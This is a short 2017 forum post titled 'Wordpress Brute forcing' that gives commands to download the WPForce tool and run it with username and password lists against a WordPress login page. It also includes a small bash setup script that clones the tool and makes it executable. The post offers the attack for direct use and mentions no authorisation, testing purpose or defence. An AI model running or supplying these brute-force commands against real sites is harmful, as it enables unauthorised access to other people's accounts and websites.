PC & IT SUPPORT MADE EASY FORUM
Would you like to react to this message? Create an account in a few clicks or log in to continue.

Wordpress Brute forcing

Go down

Wordpress Brute forcing Empty Wordpress Brute forcing

Post by jamied_uk 23rd June 2017, 16:58



git clone https://github.com/n00py/WPForce.git

cd WPForce

python wpforce.py -i usr.txt -w pass.txt -u http:site.com/wppage.php


More @ youtu.be/sYJ7qqQe4nc

Auto Setup Script


Code:
#!/bin/bash
#
# (c) J~Net 2017
# jnet.forumotion.com/t1520-wordpress-brute-forcing
#
# Usage:
#
# ./Run.sh
#
sudo git clone https://github.com/n00py/WPForce.git
#
cd WPForce
#
sudo chmod +x *.py
#
echo "Usage python wpforce.py -i usr.txt -w pass.txt -u http:site.com/wppage.php"
#
#
# https://youtu.be/sYJ7qqQe4nc

Code:
sudo chmod +x *.sh


Code:
./Run.sh
jamied_uk
jamied_uk
Admin

Posts : 3000
Join date : 2010-05-09
Age : 41
Location : UK

https://jnet.sytes.net

Back to top Go down

Back to top

- Similar topics

 
Permissions in this forum:
You cannot reply to topics in this forum